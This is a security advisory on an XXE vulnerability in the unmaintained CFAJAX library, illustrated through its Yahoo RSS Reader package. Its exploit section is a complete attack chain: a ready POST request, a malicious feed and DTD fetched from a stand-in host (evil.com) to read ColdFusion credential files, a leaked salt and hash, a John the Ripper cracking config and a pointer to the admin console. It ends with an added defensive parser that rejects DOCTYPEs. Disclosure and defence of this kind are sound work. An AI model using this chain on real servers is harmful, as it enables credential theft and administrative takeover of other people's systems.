SSD Advisory – Yahoo RSS Reader XXE Vulnerability (CFAJAX)

Vulnerability Description
A vulnerability in the way CFAJAX handles incoming requests allows attackers to cause the program to execute arbitrary code. The vulnerability is present in several packages that CFAJAX provides; below is an example of its exploitation in Yahoo RSS Reader. The vulnerability is not limited to this software but affects any software that uses CFAJAX.
Unfortunately CFAJAX is no longer maintained (the last version came out on Nov 21st 2005) and emails sent to the author go unanswered, but it is still deployed on several web sites we found on the Internet.
Technical Details
The vulnerability is exploited by supplying an XML file to a program written with CFAJAX, which is vulnerable to XXE. The XXE vulnerability allows an attacker to read locally stored files, in our example neo-security.xml and password.properties, which can then be cracked (by brute force) to gain access to the ColdFusion administrative panel.
Exploit
1. Send one HTTP POST request to a vulnerable server. The exploit data will not be logged (by default POST request payloads are not logged), only the URL being accessed.

POST /ajax/app/yahoo/functions.cfm?null.yahooGroupRssFeedReader HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17
Host: localhost
Content-Length: 213
Content-Type: application/x-www-form-urlencoded

ajax=true&clientAuthenticationKey=&callCount=1&c0-scriptName=null&c0-methodName=yahooGroupRssFeedReader&c0-id=8176_1433507473868&c0-param0=string:http://evil.com/cf-92655311.xml&c0-param1=number:10&xml=true&

2. The content of cf-92655311.xml is listed below:

<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE rss [
<!ENTITY % xxe-hash SYSTEM
"file:///ColdFusion11/cfusion/lib/neo-security.xml">
<!ENTITY % xxe-salt SYSTEM
"file:///ColdFusion11/cfusion/lib/password.properties">
<!ENTITY % end "]]>" >
<!ENTITY % start "<![CDATA[" >
<!ENTITY % dtd SYSTEM "http://evil.com/cdata-xxe.dtd">
%dtd;
]>
<rss version="2.0">
  <channel>
    <title>T</title>
    <link>L</link>
    <description>D</description>
    <item>
      <title>TT</title>
      <link>LL</link>
      <description>&all;</description>
    </item>
  </channel>
</rss>

3. The content of cdata-xxe.dtd is listed below:

<!ENTITY all "%start;%xxe-hash;%xxe-salt;%end;">

4. You should receive a response like this:

HTTP/1.1 200 OK
Date: Fri, 18 Sep 2015 16:05:02 GMT
Server: nginx
Content-Type: text/html;charset=UTF-8
Content-Length: 1767
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Sat, 01 Jan 2005 05:00:00 GMT
X-Powered-By: ASP.NET
Set-Cookie: CFID=201800; Expires=Sun, 10-Sep-2045 16:05:02 GMT; Path=/; HttpOnly
Set-Cookie: CFTOKEN=; Expires=Sun, 10-Sep-2045 16:05:02 GMT; Path=/; HttpOnly
Vary: Accept-Encoding

****/
var _8176_123123123 = null;
_8176_123123123213 = [
{ AUTHOR:' ',DESCRIPTION:' <wddxPacket version=\'1.0\'><header/><data><struct type=\'coldfusion.server.ConfigMap\'><var name=\'admin.userid.root\'><string>admin</string></var><var name=\'rds.security.enabled\'><string>true</string></var><var name=\'rds.security.usesinglerdspassword\'><boolean value=\'true\'/></var><var name=\'allowconcurrentadminlogin\'><boolean value=\'true\'/></var><var name=\'admin.userid.required\'><boolean value=\'false\'/></var><var name=\'allowedAdminIPList\'><string></string></var><var name=\'secureprofile.enabled\'><boolean value=\'false\'/></var><var name=\'CrossSiteScriptPatterns\'><struct type=\'coldfusion.server.ConfigMap\'><var name=\'&lt;\\s*(object|embed|script|applet|meta)\'><string>&lt;InvalidTag</string></var></struct></var><var name=\'contexts\'><struct type=\'coldfusion.server.ConfigMap\'><var name=\'/\'><struct type=\'coldfusion.server.ConfigMap\'></struct></var></struct></var><var name=\'rds.enabled\'><string>false</string></var><var name=\'sbs.security.enabled\'><boolean value=\'false\'/></var><var name=\'admin.userid.root.salt\'><string>PASSWORDSALTHERE</string></var><var name=\'admin.security.enabled\'><boolean value=\'true\'/></var><var name=\'AuthorizedUsers\'><struct type=\'coldfusion.util.FastHashtable\'></struct></var></struct></data></wddxPacket>\n#Tue Sep 30 05:34:21 PDT 2014\nrdspassword=\npassword=PASSWORDHASHHERE\nencrypted=true\n ',LINK:' --3-- ',PUBDATE:' ',PUBTIME:' ',TITLE:' --2-- ' }
]
DWREngine._handleResponse('8176_12312312323', _8176_123123123123, true, true, true);
/* EOF CFAJAX */

5. Extract the salt and password values:

admin.userid.root.salt\'><string>...
and
\npassword=...

6. Now that you have the salt and password, you can crack the password by following these instructions:
The hash is the password variable from ./lib/password.properties.
The salt is the admin.userid.root.salt variable from ./lib/neo-security.xml.
Configuration file for John the Ripper:

[List.Generic:dynamic_1588]
Expression=sha256($salt.sha1($pass)) (ColdFusion 11)
Flag=MGF_INPUT_32_BYTE
Flag=MGF_SALTED
Flag=MGF_FLAT_BUFFERS
Flag=MGF_BASE_16_OUTPUT_UPCASE
Func=DynamicFunc__clean_input_kwik
Func=DynamicFunc__clean_input2_kwik
Func=DynamicFunc__append_salt
Func=DynamicFunc__append_keys2
Func=DynamicFunc__SHA1_crypt_input2_append_input1
Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
Test=$dynamic_1588$37F816D599BFD69C5A0D750198AB6E46E26CEB120C9AF3B1E5306515058CBAE8$D7B6D57262290BC0A634D2D1A0DFE59F1FBE47885DBC9BB1CEBA8EA9D09D9839:test1234

7. Recover the password and log in to the admin console (the /CFIDE URL).
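The following is an added defensive example, not part of the original advisory and not CFAJAX code: a feed parser built on Python's standard-library expat bindings that refuses any DOCTYPE before a single entity declaration is read, which is the mitigation a feed-fetching endpoint such as yahooGroupRssFeedReader needs. The two sample feeds are constructed; the hostile one is a cut-down copy of the feed from step 2.

```python
import xml.parsers.expat as expat

class DoctypeRejected(ValueError):
    """Raised when feed input carries a DOCTYPE and so could declare entities."""

def parse_rss_titles(xml_bytes: bytes) -> list:
    """Return the <item><title> texts of an RSS 2.0 feed, refusing any DTD.
    RSS never needs a DOCTYPE, so parsing aborts the moment one is seen: no ENTITY
    is declared, no parameter entity expanded and no external DTD fetched."""
    parser = expat.ParserCreate()
    titles, path, text = [], [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {name!r} is not allowed in feed input")

    def on_start(tag, attrs):
        path.append(tag)
        text.clear()

    def on_end(tag):
        if path == ["rss", "channel", "item", "title"]:
            titles.append("".join(text))
        path.pop()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = text.append
    # Belt and braces: never expand parameter entities or follow external ones.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.ExternalEntityRefHandler = lambda *args: 0
    parser.Parse(xml_bytes, True)
    return titles

def is_safe_feed(xml_bytes: bytes) -> bool:
    """True if the feed parsed cleanly, False if it was rejected or malformed."""
    try:
        parse_rss_titles(xml_bytes)
    except (DoctypeRejected, expat.ExpatError):
        return False
    return True

# Constructed samples: a benign feed, and a cut-down copy of the step 2 feed.
BENIGN_FEED = b"""<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"><channel>
<title>T</title><item><title>Security &amp; patch notes</title><link>L</link></item>
<item><title>Second post</title></item></channel></rss>"""
HOSTILE_FEED = b"""<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE rss [
<!ENTITY % dtd SYSTEM "http://evil.com/cdata-xxe.dtd"> %dtd; ]>
<rss version="2.0"><channel><item><description>&all;</description></item></channel></rss>"""
```

The same gate applies to any parser that accepts attacker-supplied URLs: reject the DOCTYPE outright rather than trying to filter individual entity declarations.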

